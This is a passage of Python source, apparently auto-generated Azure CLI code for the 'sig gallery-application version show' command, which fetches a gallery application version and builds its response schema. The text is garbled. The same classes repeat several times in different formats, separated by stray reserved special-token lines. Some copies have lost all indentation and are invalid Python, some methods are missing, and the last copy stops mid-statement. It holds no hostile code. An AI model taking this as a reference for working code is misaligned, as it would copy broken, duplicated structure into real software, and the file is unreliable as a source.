                'resourceGroupName', self.ctx.args.resource_group,
                required=True,
            ),
            **self.serialize_url_param(
                'subscriptionId', self.ctx.subscription_id,
                required=True,
            ),
        }
        return params

    @property
    def query_parameters(self):
        params = {
            **self.serialize_query_param('$expand', self.ctx.args.expand),
            **self.serialize_query_param('api-version', '2022-01-03', required=True),
        }
        return params

    @property
    def header_parameters(self):
        params = {
            **self.serialize_header_param('Accept', 'application/json'),
        }
        return params

    def on_200(self, session):
        # Deserialize the JSON body and publish it as ``instance`` in the
        # command context, validated against the lazily-built 200 schema.
        payload = self.deserialize_http_content(session)
        self.ctx.set_var(
            'instance', payload,
            schema_builder=self._build_schema_on_200,
        )

    # Cached response schema, shared by all instances of this operation.
    _schema_on_200 = None

    @classmethod
    def _build_schema_on_200(cls):
        """Build (once) and return the response schema for the 200 payload."""
        if cls._schema_on_200 is not None:
            return cls._schema_on_200

        cls._schema_on_200 = AAZObjectType()
        schema = cls._schema_on_200

        # Top-level ARM resource envelope.
        schema.id = AAZStrType(flags={'read_only': True})
        schema.location = AAZStrType(flags={'required': True})
        schema.name = AAZStrType(flags={'read_only': True})
        schema.properties = AAZObjectType(flags={'client_flatten': True})
        schema.tags = AAZDictType()
        schema.type = AAZStrType(flags={'read_only': True})

        props = schema.properties
        props.provisioning_state = AAZStrType(
            serialized_name='provisioningState', flags={'read_only': True},
        )
        props.publishing_profile = AAZObjectType(
            serialized_name='publishingProfile', flags={'required': True},
        )
        props.replication_status = AAZObjectType(serialized_name='replicationStatus')

        profile = props.publishing_profile
        profile.advanced_settings = AAZDictType(serialized_name='advancedSettings')
        profile.enable_health_check = AAZBoolType(serialized_name='enableHealthCheck')
        profile.end_of_life_date = AAZStrType(serialized_name='endOfLifeDate')
        profile.exclude_from_latest = AAZBoolType(serialized_name='excludeFromLatest')
        profile.manage_actions = AAZObjectType(serialized_name='manageActions')
        profile.published_date = AAZStrType(
            serialized_name='publishedDate', flags={'read_only': True},
        )
        profile.replica_count = AAZIntType(serialized_name='replicaCount')
        profile.replication_mode = AAZStrType(serialized_name='replicationMode')
        profile.settings = AAZObjectType()
        profile.source = AAZObjectType(flags={'required': True})
        profile.storage_account_type = AAZStrType(serialized_name='storageAccountType')
        profile.target_extended_locations = AAZListType(
            serialized_name='targetExtendedLocations')
        profile.target_regions = AAZListType(serialized_name='targetRegions')

        profile.advanced_settings.Element = AAZStrType()

        manage_actions = profile.manage_actions
        manage_actions.install = AAZStrType(flags={'required': True})
        manage_actions.remove = AAZStrType(flags={'required': True})
        manage_actions.update = AAZStrType()

        settings = profile.settings
        settings.config_file_name = AAZStrType(serialized_name='configFileName')
        settings.package_file_name = AAZStrType(serialized_name='packageFileName')

        source = profile.source
        source.default_configuration_link = AAZStrType(
            serialized_name='defaultConfigurationLink')
        source.media_link = AAZStrType(
            serialized_name='mediaLink', flags={'required': True},
        )

        # Per-extended-location replication target (shares the encryption
        # sub-schema with target_regions via _ShowHelper).
        profile.target_extended_locations.Element = AAZObjectType()
        elem = profile.target_extended_locations.Element
        elem.encryption = AAZObjectType()
        _ShowHelper._build_schema_encryption_images_read(elem.encryption)
        elem.extended_location = AAZObjectType(serialized_name='extendedLocation')
        elem.extended_location_replica_count = AAZIntType(
            serialized_name='extendedLocationReplicaCount')
        elem.name = AAZStrType()
        elem.storage_account_type = AAZStrType(serialized_name='storageAccountType')

        ext_loc = elem.extended_location
        ext_loc.name = AAZStrType()
        ext_loc.type = AAZStrType()

        # Per-region replication target.
        profile.target_regions.Element = AAZObjectType()
        elem = profile.target_regions.Element
        elem.encryption = AAZObjectType()
        _ShowHelper._build_schema_encryption_images_read(elem.encryption)
        elem.name = AAZStrType(flags={'required': True})
        elem.regional_replica_count = AAZIntType(serialized_name='regionalReplicaCount')
        elem.storage_account_type = AAZStrType(serialized_name='storageAccountType')

        repl_status = props.replication_status
        repl_status.aggregated_state = AAZStrType(
            serialized_name='aggregatedState', flags={'read_only': True},
        )
        repl_status.summary = AAZListType(flags={'read_only': True})

        repl_status.summary.Element = AAZObjectType()
        elem = repl_status.summary.Element
        elem.details = AAZStrType(flags={'read_only': True})
        elem.progress = AAZIntType(flags={'read_only': True})
        elem.region = AAZStrType(flags={'read_only': True})
        elem.state = AAZStrType(flags={'read_only': True})

        schema.tags.Element = AAZStrType()

        return cls._schema_on_200
class _ShowHelper:
    """Helper class for Show"""

    # Cached ``EncryptionImages`` schema fragment, built on first use and
    # shared by every caller of _build_schema_encryption_images_read.
    _schema_encryption_images_read = None

    @classmethod
    def _build_schema_encryption_images_read(cls, _schema):
        """Attach the (cached) encryption-images sub-schema onto *_schema*."""
        if cls._schema_encryption_images_read is None:
            schema = AAZObjectType()
            cls._schema_encryption_images_read = schema

            schema.data_disk_images = AAZListType(serialized_name='dataDiskImages')
            schema.os_disk_image = AAZObjectType(serialized_name='osDiskImage')

            schema.data_disk_images.Element = AAZObjectType()
            disk_elem = schema.data_disk_images.Element
            disk_elem.disk_encryption_set_id = AAZStrType(
                serialized_name='diskEncryptionSetId')
            disk_elem.lun = AAZIntType(flags={'required': True})

            os_disk_image = schema.os_disk_image
            os_disk_image.disk_encryption_set_id = AAZStrType(
                serialized_name='diskEncryptionSetId')
            os_disk_image.security_profile = AAZObjectType(
                serialized_name='securityProfile')

            security_profile = os_disk_image.security_profile
            security_profile.confidential_vm_encryption_type = AAZStrType(
                serialized_name='confidentialVMEncryptionType')
            security_profile.secure_vm_disk_encryption_set_id = AAZStrType(
                serialized_name='secureVMDiskEncryptionSetId')

        # Wire the shared fragment into the caller-supplied schema node.
        _schema.data_disk_images = cls._schema_encryption_images_read.data_disk_images
        _schema.os_disk_image = cls._schema_encryption_images_read.os_disk_image
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@register_command('sig gallery-application version show')
class Show(AAZCommand):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
    def _handler(self, command_args):
        """Entry point: parse args, run the GET, and return the output."""
        super()._handler(command_args)
        self._execute_operations()
        return self._output()
<|reserved_special_token_0|>
@classmethod
def _build_arguments_schema(cls, *args, **kwargs):
if cls._args_schema is not None:
return cls._args_schema
cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
_args_schema = cls._args_schema
_args_schema.gallery_application_name = AAZStrArg(options=[
'--application-name', '--gallery-application-name'], help=
'The name of the gallery application.', required=True, id_part=
'child_name_1')
_args_schema.gallery_application_version_name = AAZStrArg(options=[
'-n', '--name', '--version-name',
'--gallery-application-version-name'], help=
'The name of the gallery application version.', required=True,
id_part='child_name_2')
_args_schema.gallery_name = AAZStrArg(options=['-r',
'--gallery-name'], help='Gallery name.', required=True, id_part
='name')
_args_schema.resource_group = AAZResourceGroupNameArg(help=
'Name of resource group. You can configure the default group using `az configure --defaults group=<name>`.'
, required=True)
_args_schema.expand = AAZStrArg(options=['--expand'], help=
'The expand expression to apply on the operation. "ReplicationStatus" Default value is None.'
, enum={'ReplicationStatus': 'ReplicationStatus'})
return cls._args_schema
    def _execute_operations(self):
        """Run pre-hooks, the single HTTP GET operation, then post-hooks."""
        self.pre_operations()
        self.GalleryApplicationVersionsGet(ctx=self.ctx)()
        self.post_operations()
    @register_callback
    def pre_operations(self):
        """Extension hook invoked before the GET request is sent."""
        pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class GalleryApplicationVersionsGet(AAZHttpOperation):
    """HTTP GET for a single Microsoft.Compute gallery application version.

    On a 200 response the payload is deserialized into the command
    context variable ``instance`` using the schema declared below.
    """

    CLIENT_TYPE = 'MgmtClient'

    def __call__(self, *args, **kwargs):
        # Send synchronously; 200 is the only success status for this GET,
        # anything else is routed to the shared ODataV4 error handler.
        req = self.make_request()
        sess = self.client.send_request(request=req, stream=False, **kwargs)
        if sess.http_response.status_code in [200]:
            return self.on_200(sess)
        return self.on_error(sess.http_response)

    @property
    def url(self):
        # ARM resource-id template; placeholders come from url_parameters.
        return self.client.format_url(
            '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}',
            **self.url_parameters
        )

    @property
    def method(self):
        return 'GET'

    @property
    def error_format(self):
        # Error bodies from this endpoint follow the OData v4 error shape.
        return 'ODataV4Format'

    @property
    def url_parameters(self):
        params = {
            **self.serialize_url_param(
                'galleryApplicationName', self.ctx.args.gallery_application_name,
                required=True,
            ),
            **self.serialize_url_param(
                'galleryApplicationVersionName',
                self.ctx.args.gallery_application_version_name,
                required=True,
            ),
            **self.serialize_url_param(
                'galleryName', self.ctx.args.gallery_name,
                required=True,
            ),
            **self.serialize_url_param(
                'resourceGroupName', self.ctx.args.resource_group,
                required=True,
            ),
            **self.serialize_url_param(
                'subscriptionId', self.ctx.subscription_id,
                required=True,
            ),
        }
        return params

    @property
    def query_parameters(self):
        params = {
            **self.serialize_query_param('$expand', self.ctx.args.expand),
            **self.serialize_query_param('api-version', '2022-01-03', required=True),
        }
        return params

    @property
    def header_parameters(self):
        params = {
            **self.serialize_header_param('Accept', 'application/json'),
        }
        return params

    def on_200(self, session):
        # Deserialize the JSON body and publish it as ``instance`` in the
        # command context, validated against the lazily-built 200 schema.
        payload = self.deserialize_http_content(session)
        self.ctx.set_var(
            'instance', payload,
            schema_builder=self._build_schema_on_200,
        )

    # Cached response schema, shared by all instances of this operation.
    _schema_on_200 = None

    @classmethod
    def _build_schema_on_200(cls):
        """Build (once) and return the response schema for the 200 payload."""
        if cls._schema_on_200 is not None:
            return cls._schema_on_200

        cls._schema_on_200 = AAZObjectType()
        schema = cls._schema_on_200

        # Top-level ARM resource envelope.
        schema.id = AAZStrType(flags={'read_only': True})
        schema.location = AAZStrType(flags={'required': True})
        schema.name = AAZStrType(flags={'read_only': True})
        schema.properties = AAZObjectType(flags={'client_flatten': True})
        schema.tags = AAZDictType()
        schema.type = AAZStrType(flags={'read_only': True})

        props = schema.properties
        props.provisioning_state = AAZStrType(
            serialized_name='provisioningState', flags={'read_only': True},
        )
        props.publishing_profile = AAZObjectType(
            serialized_name='publishingProfile', flags={'required': True},
        )
        props.replication_status = AAZObjectType(serialized_name='replicationStatus')

        profile = props.publishing_profile
        profile.advanced_settings = AAZDictType(serialized_name='advancedSettings')
        profile.enable_health_check = AAZBoolType(serialized_name='enableHealthCheck')
        profile.end_of_life_date = AAZStrType(serialized_name='endOfLifeDate')
        profile.exclude_from_latest = AAZBoolType(serialized_name='excludeFromLatest')
        profile.manage_actions = AAZObjectType(serialized_name='manageActions')
        profile.published_date = AAZStrType(
            serialized_name='publishedDate', flags={'read_only': True},
        )
        profile.replica_count = AAZIntType(serialized_name='replicaCount')
        profile.replication_mode = AAZStrType(serialized_name='replicationMode')
        profile.settings = AAZObjectType()
        profile.source = AAZObjectType(flags={'required': True})
        profile.storage_account_type = AAZStrType(serialized_name='storageAccountType')
        profile.target_extended_locations = AAZListType(
            serialized_name='targetExtendedLocations')
        profile.target_regions = AAZListType(serialized_name='targetRegions')

        profile.advanced_settings.Element = AAZStrType()

        manage_actions = profile.manage_actions
        manage_actions.install = AAZStrType(flags={'required': True})
        manage_actions.remove = AAZStrType(flags={'required': True})
        manage_actions.update = AAZStrType()

        settings = profile.settings
        settings.config_file_name = AAZStrType(serialized_name='configFileName')
        settings.package_file_name = AAZStrType(serialized_name='packageFileName')

        source = profile.source
        source.default_configuration_link = AAZStrType(
            serialized_name='defaultConfigurationLink')
        source.media_link = AAZStrType(
            serialized_name='mediaLink', flags={'required': True},
        )

        # Per-extended-location replication target (shares the encryption
        # sub-schema with target_regions via _ShowHelper).
        profile.target_extended_locations.Element = AAZObjectType()
        elem = profile.target_extended_locations.Element
        elem.encryption = AAZObjectType()
        _ShowHelper._build_schema_encryption_images_read(elem.encryption)
        elem.extended_location = AAZObjectType(serialized_name='extendedLocation')
        elem.extended_location_replica_count = AAZIntType(
            serialized_name='extendedLocationReplicaCount')
        elem.name = AAZStrType()
        elem.storage_account_type = AAZStrType(serialized_name='storageAccountType')

        ext_loc = elem.extended_location
        ext_loc.name = AAZStrType()
        ext_loc.type = AAZStrType()

        # Per-region replication target.
        profile.target_regions.Element = AAZObjectType()
        elem = profile.target_regions.Element
        elem.encryption = AAZObjectType()
        _ShowHelper._build_schema_encryption_images_read(elem.encryption)
        elem.name = AAZStrType(flags={'required': True})
        elem.regional_replica_count = AAZIntType(serialized_name='regionalReplicaCount')
        elem.storage_account_type = AAZStrType(serialized_name='storageAccountType')

        repl_status = props.replication_status
        repl_status.aggregated_state = AAZStrType(
            serialized_name='aggregatedState', flags={'read_only': True},
        )
        repl_status.summary = AAZListType(flags={'read_only': True})

        repl_status.summary.Element = AAZObjectType()
        elem = repl_status.summary.Element
        elem.details = AAZStrType(flags={'read_only': True})
        elem.progress = AAZIntType(flags={'read_only': True})
        elem.region = AAZStrType(flags={'read_only': True})
        elem.state = AAZStrType(flags={'read_only': True})

        schema.tags.Element = AAZStrType()

        return cls._schema_on_200
class _ShowHelper:
    """Helper class for Show"""

    # Cached ``EncryptionImages`` schema fragment, built on first use and
    # shared by every caller of _build_schema_encryption_images_read.
    _schema_encryption_images_read = None

    @classmethod
    def _build_schema_encryption_images_read(cls, _schema):
        """Attach the (cached) encryption-images sub-schema onto *_schema*."""
        if cls._schema_encryption_images_read is None:
            schema = AAZObjectType()
            cls._schema_encryption_images_read = schema

            schema.data_disk_images = AAZListType(serialized_name='dataDiskImages')
            schema.os_disk_image = AAZObjectType(serialized_name='osDiskImage')

            schema.data_disk_images.Element = AAZObjectType()
            disk_elem = schema.data_disk_images.Element
            disk_elem.disk_encryption_set_id = AAZStrType(
                serialized_name='diskEncryptionSetId')
            disk_elem.lun = AAZIntType(flags={'required': True})

            os_disk_image = schema.os_disk_image
            os_disk_image.disk_encryption_set_id = AAZStrType(
                serialized_name='diskEncryptionSetId')
            os_disk_image.security_profile = AAZObjectType(
                serialized_name='securityProfile')

            security_profile = os_disk_image.security_profile
            security_profile.confidential_vm_encryption_type = AAZStrType(
                serialized_name='confidentialVMEncryptionType')
            security_profile.secure_vm_disk_encryption_set_id = AAZStrType(
                serialized_name='secureVMDiskEncryptionSetId')

        # Wire the shared fragment into the caller-supplied schema node.
        _schema.data_disk_images = cls._schema_encryption_images_read.data_disk_images
        _schema.os_disk_image = cls._schema_encryption_images_read.os_disk_image
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@register_command('sig gallery-application version show')
class Show(AAZCommand):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
    def _handler(self, command_args):
        """Entry point: parse args, run the GET, and return the output."""
        super()._handler(command_args)
        self._execute_operations()
        return self._output()
<|reserved_special_token_0|>
@classmethod
def _build_arguments_schema(cls, *args, **kwargs):
if cls._args_schema is not None:
return cls._args_schema
cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
_args_schema = cls._args_schema
_args_schema.gallery_application_name = AAZStrArg(options=[
'--application-name', '--gallery-application-name'], help=
'The name of the gallery application.', required=True, id_part=
'child_name_1')
_args_schema.gallery_application_version_name = AAZStrArg(options=[
'-n', '--name', '--version-name',
'--gallery-application-version-name'], help=
'The name of the gallery application version.', required=True,
id_part='child_name_2')
_args_schema.gallery_name = AAZStrArg(options=['-r',
'--gallery-name'], help='Gallery name.', required=True, id_part
='name')
_args_schema.resource_group = AAZResourceGroupNameArg(help=
'Name of resource group. You can configure the default group using `az configure --defaults group=<name>`.'
, required=True)
_args_schema.expand = AAZStrArg(options=['--expand'], help=
'The expand expression to apply on the operation. "ReplicationStatus" Default value is None.'
, enum={'ReplicationStatus': 'ReplicationStatus'})
return cls._args_schema
    def _execute_operations(self):
        """Run pre-hooks, the single HTTP GET operation, then post-hooks."""
        self.pre_operations()
        self.GalleryApplicationVersionsGet(ctx=self.ctx)()
        self.post_operations()
    @register_callback
    def pre_operations(self):
        """Extension hook invoked before the GET request is sent."""
        pass
<|reserved_special_token_0|>
    def _output(self, *args, **kwargs):
        # client_flatten=True folds the 'properties' bag into the top level,
        # matching the flags={'client_flatten': True} schema declaration.
        result = self.deserialize_output(self.ctx.vars.instance,
            client_flatten=True)
        return result
class GalleryApplicationVersionsGet(AAZHttpOperation):
CLIENT_TYPE = 'MgmtClient'
def __call__(self, *args, **kwargs):
request = self.make_request()
session = self.client.send_request(request=request, stream=
False, **kwargs)
if session.http_response.status_code in [200]:
return self.on_200(session)
return self.on_error(session.http_response)
@property
def url(self):
return self.client.format_url(
'/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}'
, **self.url_parameters)
@property
def method(self):
return 'GET'
@property
def error_format(self):
return 'ODataV4Format'
@property
def url_parameters(self):
parameters = {**self.serialize_url_param(
'galleryApplicationName', self.ctx.args.
gallery_application_name, required=True), **self.
serialize_url_param('galleryApplicationVersionName', self.
ctx.args.gallery_application_version_name, required=True),
**self.serialize_url_param('galleryName', self.ctx.args.
gallery_name, required=True), **self.serialize_url_param(
'resourceGroupName', self.ctx.args.resource_group, required
=True), **self.serialize_url_param('subscriptionId', self.
ctx.subscription_id, required=True)}
return parameters
@property
def query_parameters(self):
parameters = {**self.serialize_query_param('$expand', self.ctx.
args.expand), **self.serialize_query_param('api-version',
'2022-01-03', required=True)}
return parameters
@property
def header_parameters(self):
parameters = {**self.serialize_header_param('Accept',
'application/json')}
return parameters
def on_200(self, session):
data = self.deserialize_http_content(session)
self.ctx.set_var('instance', data, schema_builder=self.
_build_schema_on_200)
_schema_on_200 = None
@classmethod
def _build_schema_on_200(cls):
if cls._schema_on_200 is not None:
return cls._schema_on_200
cls._schema_on_200 = AAZObjectType()
_schema_on_200 = cls._schema_on_200
_schema_on_200.id = AAZStrType(flags={'read_only': True})
_schema_on_200.location = AAZStrType(flags={'required': True})
_schema_on_200.name = AAZStrType(flags={'read_only': True})
_schema_on_200.properties = AAZObjectType(flags={
'client_flatten': True})
_schema_on_200.tags = AAZDictType()
_schema_on_200.type = AAZStrType(flags={'read_only': True})
properties = cls._schema_on_200.properties
properties.provisioning_state = AAZStrType(serialized_name=
'provisioningState', flags={'read_only': True})
properties.publishing_profile = AAZObjectType(serialized_name=
'publishingProfile', flags={'required': True})
properties.replication_status = AAZObjectType(serialized_name=
'replicationStatus')
publishing_profile = (cls._schema_on_200.properties.
publishing_profile)
publishing_profile.advanced_settings = AAZDictType(serialized_name
='advancedSettings')
publishing_profile.enable_health_check = AAZBoolType(
serialized_name='enableHealthCheck')
publishing_profile.end_of_life_date = AAZStrType(serialized_name
='endOfLifeDate')
publishing_profile.exclude_from_latest = AAZBoolType(
serialized_name='excludeFromLatest')
publishing_profile.manage_actions = AAZObjectType(serialized_name
='manageActions')
publishing_profile.published_date = AAZStrType(serialized_name=
'publishedDate', flags={'read_only': True})
publishing_profile.replica_count = AAZIntType(serialized_name=
'replicaCount')
publishing_profile.replication_mode = AAZStrType(serialized_name
='replicationMode')
publishing_profile.settings = AAZObjectType()
publishing_profile.source = AAZObjectType(flags={'required': True})
publishing_profile.storage_account_type = AAZStrType(
serialized_name='storageAccountType')
publishing_profile.target_extended_locations = AAZListType(
serialized_name='targetExtendedLocations')
publishing_profile.target_regions = AAZListType(serialized_name
='targetRegions')
advanced_settings = (cls._schema_on_200.properties.
publishing_profile.advanced_settings)
advanced_settings.Element = AAZStrType()
manage_actions = (cls._schema_on_200.properties.
publishing_profile.manage_actions)
manage_actions.install = AAZStrType(flags={'required': True})
manage_actions.remove = AAZStrType(flags={'required': True})
manage_actions.update = AAZStrType()
settings = (cls._schema_on_200.properties.publishing_profile.
settings)
settings.config_file_name = AAZStrType(serialized_name=
'configFileName')
settings.package_file_name = AAZStrType(serialized_name=
'packageFileName')
source = cls._schema_on_200.properties.publishing_profile.source
source.default_configuration_link = AAZStrType(serialized_name=
'defaultConfigurationLink')
source.media_link = AAZStrType(serialized_name='mediaLink',
flags={'required': True})
target_extended_locations = (cls._schema_on_200.properties.
publishing_profile.target_extended_locations)
target_extended_locations.Element = AAZObjectType()
_element = (cls._schema_on_200.properties.publishing_profile.
target_extended_locations.Element)
_element.encryption = AAZObjectType()
_ShowHelper._build_schema_encryption_images_read(_element.
encryption)
_element.extended_location = AAZObjectType(serialized_name=
'extendedLocation')
_element.extended_location_replica_count = AAZIntType(
serialized_name='extendedLocationReplicaCount')
_element.name = AAZStrType()
_element.storage_account_type = AAZStrType(serialized_name=
'storageAccountType')
extended_location = (cls._schema_on_200.properties.
publishing_profile.target_extended_locations.Element.
extended_location)
extended_location.name = AAZStrType()
extended_location.type = AAZStrType()
target_regions = (cls._schema_on_200.properties.
publishing_profile.target_regions)
target_regions.Element = AAZObjectType()
_element = (cls._schema_on_200.properties.publishing_profile.
target_regions.Element)
_element.encryption = AAZObjectType()
_ShowHelper._build_schema_encryption_images_read(_element.
encryption)
_element.name = AAZStrType(flags={'required': True})
_element.regional_replica_count = AAZIntType(serialized_name=
'regionalReplicaCount')
_element.storage_account_type = AAZStrType(serialized_name=
'storageAccountType')
replication_status = (cls._schema_on_200.properties.
replication_status)
replication_status.aggregated_state = AAZStrType(serialized_name
='aggregatedState', flags={'read_only': True})
replication_status.summary = AAZListType(flags={'read_only': True})
summary = cls._schema_on_200.properties.replication_status.summary
summary.Element = AAZObjectType()
_element = (cls._schema_on_200.properties.replication_status.
summary.Element)
_element.details = AAZStrType(flags={'read_only': True})
_element.progress = AAZIntType(flags={'read_only': True})
_element.region = AAZStrType(flags={'read_only': True})
_element.state = AAZStrType(flags={'read_only': True})
tags = cls._schema_on_200.tags
tags.Element = AAZStrType()
return cls._schema_on_200
class _ShowHelper:
    """Helper class for Show: builds and caches the shared encryption-images schema."""

    # Class-level cache: the schema is built once and reused by every caller.
    _schema_encryption_images_read = None

    @classmethod
    def _build_schema_encryption_images_read(cls, _schema):
        # Fast path: copy the cached sub-schemas onto the caller's node.
        if cls._schema_encryption_images_read is not None:
            _schema.data_disk_images = cls._schema_encryption_images_read.data_disk_images
            _schema.os_disk_image = cls._schema_encryption_images_read.os_disk_image
            return

        cls._schema_encryption_images_read = _schema_encryption_images_read = AAZObjectType()
        encryption_images_read = _schema_encryption_images_read
        encryption_images_read.data_disk_images = AAZListType(
            serialized_name="dataDiskImages",
        )
        encryption_images_read.os_disk_image = AAZObjectType(
            serialized_name="osDiskImage",
        )
        # dataDiskImages[]: per-LUN disk-encryption-set references.
        data_disk_images = _schema_encryption_images_read.data_disk_images
        data_disk_images.Element = AAZObjectType()
        _element = _schema_encryption_images_read.data_disk_images.Element
        _element.disk_encryption_set_id = AAZStrType(
            serialized_name="diskEncryptionSetId",
        )
        _element.lun = AAZIntType(
            flags={"required": True},
        )
        # osDiskImage: encryption settings plus optional security profile.
        os_disk_image = _schema_encryption_images_read.os_disk_image
        os_disk_image.disk_encryption_set_id = AAZStrType(
            serialized_name="diskEncryptionSetId",
        )
        os_disk_image.security_profile = AAZObjectType(
            serialized_name="securityProfile",
        )
        security_profile = _schema_encryption_images_read.os_disk_image.security_profile
        security_profile.confidential_vm_encryption_type = AAZStrType(
            serialized_name="confidentialVMEncryptionType",
        )
        security_profile.secure_vm_disk_encryption_set_id = AAZStrType(
            serialized_name="secureVMDiskEncryptionSetId",
        )
        # Finally attach the freshly built sub-schemas to the caller's node.
        _schema.data_disk_images = cls._schema_encryption_images_read.data_disk_images
        _schema.os_disk_image = cls._schema_encryption_images_read.os_disk_image
<|reserved_special_token_0|>
<|reserved_special_token_1|>
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#
# Code generated by aaz-dev-tools
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# flake8: noqa
from azure.cli.core.aaz import *
@register_command(
    "sig gallery-application version show",
)
class Show(AAZCommand):
    """Get information about a gallery application version.
    """
    # Metadata binding this command to its REST resource and api-version.
    _aaz_info = {
        "version": "2022-01-03",
        "resources": [
            ["mgmt-plane", "/subscriptions/{}/resourcegroups/{}/providers/microsoft.compute/galleries/{}/applications/{}/versions/{}", "2022-01-03"],
        ]
    }
    def _handler(self, command_args):
        """Command entry point: parse args, run the GET operation, return output."""
        super()._handler(command_args)
        self._execute_operations()
        return self._output()
    # Cached argument schema, built once per process by _build_arguments_schema.
    _args_schema = None
    @classmethod
    def _build_arguments_schema(cls, *args, **kwargs):
        """Build (once) and cache the CLI argument schema for this command."""
        if cls._args_schema is not None:
            return cls._args_schema
        cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
        # define Arg Group ""
        _args_schema = cls._args_schema
        _args_schema.gallery_application_name = AAZStrArg(
            options=["--application-name", "--gallery-application-name"],
            help="The name of the gallery application.",
            required=True,
            id_part="child_name_1",
        )
        _args_schema.gallery_application_version_name = AAZStrArg(
            options=["-n", "--name", "--version-name", "--gallery-application-version-name"],
            help="The name of the gallery application version.",
            required=True,
            id_part="child_name_2",
        )
        _args_schema.gallery_name = AAZStrArg(
            options=["-r", "--gallery-name"],
            help="Gallery name.",
            required=True,
            id_part="name",
        )
        _args_schema.resource_group = AAZResourceGroupNameArg(
            help="Name of resource group. You can configure the default group using `az configure --defaults group=<name>`.",
            required=True,
        )
        _args_schema.expand = AAZStrArg(
            options=["--expand"],
            help="The expand expression to apply on the operation. \"ReplicationStatus\" Default value is None.",
            enum={"ReplicationStatus": "ReplicationStatus"},
        )
        return cls._args_schema
    def _execute_operations(self):
        """Run the single GET operation, bracketed by the pre/post hooks."""
        self.pre_operations()
        self.GalleryApplicationVersionsGet(ctx=self.ctx)()
        self.post_operations()
    @register_callback
    def pre_operations(self):
        # Extension hook; no-op in the generated code.
        pass
    @register_callback
    def post_operations(self):
        # Extension hook; no-op in the generated code.
        pass
    def _output(self, *args, **kwargs):
        """Deserialize the fetched resource (ctx var "instance") into command output."""
        # client_flatten=True collapses fields flagged "client_flatten" in the
        # response schema (the "properties" bag) into their parent object.
        result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)
        return result
    # HTTP GET for a single gallery application version; stores the 200
    # response body as the "instance" context variable.
    class GalleryApplicationVersionsGet(AAZHttpOperation):
        CLIENT_TYPE = "MgmtClient"
        def __call__(self, *args, **kwargs):
            """Send the request; only HTTP 200 is treated as success for this GET."""
            request = self.make_request()
            session = self.client.send_request(request=request, stream=False, **kwargs)
            if session.http_response.status_code in [200]:
                return self.on_200(session)
            return self.on_error(session.http_response)
        @property
        def url(self):
            # ARM resource-id template for a gallery application version.
            return self.client.format_url(
                "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}",
                **self.url_parameters
            )
        @property
        def method(self):
            return "GET"
        @property
        def error_format(self):
            return "ODataV4Format"
        @property
        def url_parameters(self):
            # Every path segment of the resource id is mandatory.
            parameters = {
                **self.serialize_url_param(
                    "galleryApplicationName", self.ctx.args.gallery_application_name,
                    required=True,
                ),
                **self.serialize_url_param(
                    "galleryApplicationVersionName", self.ctx.args.gallery_application_version_name,
                    required=True,
                ),
                **self.serialize_url_param(
                    "galleryName", self.ctx.args.gallery_name,
                    required=True,
                ),
                **self.serialize_url_param(
                    "resourceGroupName", self.ctx.args.resource_group,
                    required=True,
                ),
                **self.serialize_url_param(
                    "subscriptionId", self.ctx.subscription_id,
                    required=True,
                ),
            }
            return parameters
        @property
        def query_parameters(self):
            # $expand is optional; api-version is pinned to the generated version.
            parameters = {
                **self.serialize_query_param(
                    "$expand", self.ctx.args.expand,
                ),
                **self.serialize_query_param(
                    "api-version", "2022-01-03",
                    required=True,
                ),
            }
            return parameters
        @property
        def header_parameters(self):
            parameters = {
                **self.serialize_header_param(
                    "Accept", "application/json",
                ),
            }
            return parameters
        def on_200(self, session):
            """Deserialize the 200 response and stash it as the "instance" ctx var."""
            data = self.deserialize_http_content(session)
            self.ctx.set_var(
                "instance",
                data,
                schema_builder=self._build_schema_on_200
            )
        # Class-level cache for the lazily built response schema.
        _schema_on_200 = None
        @classmethod
        def _build_schema_on_200(cls):
            """Build (once) and cache the deserialization schema for HTTP 200."""
            if cls._schema_on_200 is not None:
                return cls._schema_on_200
            cls._schema_on_200 = AAZObjectType()
            # Top-level resource envelope.
            _schema_on_200 = cls._schema_on_200
            _schema_on_200.id = AAZStrType(
                flags={"read_only": True},
            )
            _schema_on_200.location = AAZStrType(
                flags={"required": True},
            )
            _schema_on_200.name = AAZStrType(
                flags={"read_only": True},
            )
            _schema_on_200.properties = AAZObjectType(
                flags={"client_flatten": True},
            )
            _schema_on_200.tags = AAZDictType()
            _schema_on_200.type = AAZStrType(
                flags={"read_only": True},
            )
            properties = cls._schema_on_200.properties
            properties.provisioning_state = AAZStrType(
                serialized_name="provisioningState",
                flags={"read_only": True},
            )
            properties.publishing_profile = AAZObjectType(
                serialized_name="publishingProfile",
                flags={"required": True},
            )
            properties.replication_status = AAZObjectType(
                serialized_name="replicationStatus",
            )
            # properties.publishingProfile
            publishing_profile = cls._schema_on_200.properties.publishing_profile
            publishing_profile.advanced_settings = AAZDictType(
                serialized_name="advancedSettings",
            )
            publishing_profile.enable_health_check = AAZBoolType(
                serialized_name="enableHealthCheck",
            )
            publishing_profile.end_of_life_date = AAZStrType(
                serialized_name="endOfLifeDate",
            )
            publishing_profile.exclude_from_latest = AAZBoolType(
                serialized_name="excludeFromLatest",
            )
            publishing_profile.manage_actions = AAZObjectType(
                serialized_name="manageActions",
            )
            publishing_profile.published_date = AAZStrType(
                serialized_name="publishedDate",
                flags={"read_only": True},
            )
            publishing_profile.replica_count = AAZIntType(
                serialized_name="replicaCount",
            )
            publishing_profile.replication_mode = AAZStrType(
